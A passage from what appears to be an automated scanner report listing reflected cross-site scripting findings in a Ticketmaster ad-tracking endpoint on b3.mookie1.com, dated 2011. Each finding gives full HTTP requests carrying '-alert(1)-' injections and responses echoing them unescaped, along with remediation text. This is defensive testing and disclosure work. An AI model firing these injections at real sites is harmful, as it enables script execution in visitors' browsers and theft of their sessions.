GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=35295'-alert(1)-'a3368e69539&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
;
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='35295'-alert(1)-'a3368e69539';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image
...[SNIP]...

4.59. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_confcode_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_confcode_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a9a8'-alert(1)-'30c8d0703c7 was submitted in the _RM_HTML_confcode_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=7a9a8'-alert(1)-'30c8d0703c7&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
e_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='7a9a8'-alert(1)-'30c8d0703c7';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='1
...[SNIP]...

4.60. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_country_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_country_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d062'-alert(1)-'cd41cc7dc96 was submitted in the _RM_HTML_country_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=7d062'-alert(1)-'cd41cc7dc96&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38410
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='7d062'-alert(1)-'cd41cc7dc96';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e =
...[SNIP]...

4.61. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_date_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_date_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fd05'-alert(1)-'d3d6bae4899 was submitted in the _RM_HTML_event_date_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F20119fd05'-alert(1)-'d3d6bae4899&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/20119fd05'-alert(1)-'d3d6bae4899';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue=''
...[SNIP]...

4.62. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_day_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_day_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a194'-alert(1)-'7572b7944d9 was submitted in the _RM_HTML_event_day_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed5a194'-alert(1)-'7572b7944d9&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed5a194'-alert(1)-'7572b7944d9';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip=
...[SNIP]...

4.63. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_name_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_name_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 540a3'-alert(1)-'11fecdb1994 was submitted in the _RM_HTML_event_name_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour540a3'-alert(1)-'11fecdb1994&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour540a3'-alert(1)-'11fecdb1994';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
...[SNIP]...

4.64. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_time_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35faf'-alert(1)-'c3b69505d19 was submitted in the _RM_HTML_event_time_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM35faf'-alert(1)-'c3b69505d19&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM35faf'-alert(1)-'c3b69505d19';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var
...[SNIP]...

4.65. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_zone_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_time_zone_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40ff5'-alert(1)-'ce08c7702c7 was submitted in the _RM_HTML_event_time_zone_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

